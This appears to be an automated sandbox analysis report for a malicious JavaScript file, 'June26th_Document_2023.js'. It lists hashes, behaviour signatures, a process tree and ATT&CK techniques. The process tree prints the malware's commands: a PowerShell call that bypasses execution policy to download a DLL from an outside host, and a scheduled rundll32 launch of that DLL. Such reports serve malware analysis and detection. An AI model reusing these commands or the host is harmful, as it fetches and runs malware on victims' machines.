b7aa9a7e7956a2be2fddf860f40d1e26e87c1b0b12a0ff7723445b4b7eea0810

Resubmissions

26-06-2023 15:36

230626-s1ydxabc2s 8

26-06-2023 14:10

230626-rg4wxaaa65 8

Analysis

max time kernel
90s
max time network
30s
platform
windows7_x64
resource
win7-20230621-en
resource tags

arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
submitted
26-06-2023 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

June26th_Document_2023.js
Size

873KB
MD5

54187639d9027e6c3040367bcd69141a
SHA1

85d1274413c026b102dd6e6ddddea6ab8a399c00
SHA256

58d23b1de893e0fed73b8dcb80fcb2f5eb14359970ac35cc4ef0582dd1889134
SHA512

ebef7df4649b83dc34e9004a764a2995d7a5ffecdaed43c0b93bbb20302083260211373561861eb44d14f28986a97315c3ab23b8332e61f410ed049bc536736e
SSDEEP

24576:Vz1cgkPL8Kon29iRvE0azoX4Cpb2FiFRoxfhqAq8hPXJI9a:h1cgkPL8Kon29iRvE0azoX4HFiFRoxf3

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1628	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1628	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1280 wrote to memory of 1628	1280	wscript.exe	28
PID 1280 wrote to memory of 1628	1280	wscript.exe	28
PID 1280 wrote to memory of 1628	1280	wscript.exe	28
PID 1748 wrote to memory of 1800	1748	taskeng.exe	31
PID 1748 wrote to memory of 1800	1748	taskeng.exe	31
PID 1748 wrote to memory of 1800	1748	taskeng.exe	31

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\June26th_Document_2023.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Invoke-WebRequest https://prodrepbox.com/images/viewforum.php?thread=2547 -OutFile C:\Users\Admin\AppData\Local\Temp\7EC5BA-BE5D-A4D029-9A4E89BCA4F0\geniuskb.dll
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1628

C:\Windows\system32\taskeng.exe
taskeng.exe {F4936754-1213-4896-B8B6-5AC041D80A18} S-1-5-21-1306246566-3334493410-3785284834-1000:FQMLBKKW\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE C:\Users\Admin\AppData\Local\Temp\7EC5BA-BE5D-A4D029-9A4E89BCA4F0\geniuskb.dll vcab /k vanil357
  2⤵
  PID:1800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1628-59-0x000000001B060000-0x000000001B342000-memory.dmp

Filesize
2.9MB

Download
memory/1628-60-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/1628-61-0x0000000002784000-0x0000000002787000-memory.dmp

Filesize
12KB

Download
memory/1628-62-0x000000000278B000-0x00000000027C2000-memory.dmp

Filesize
220KB

Download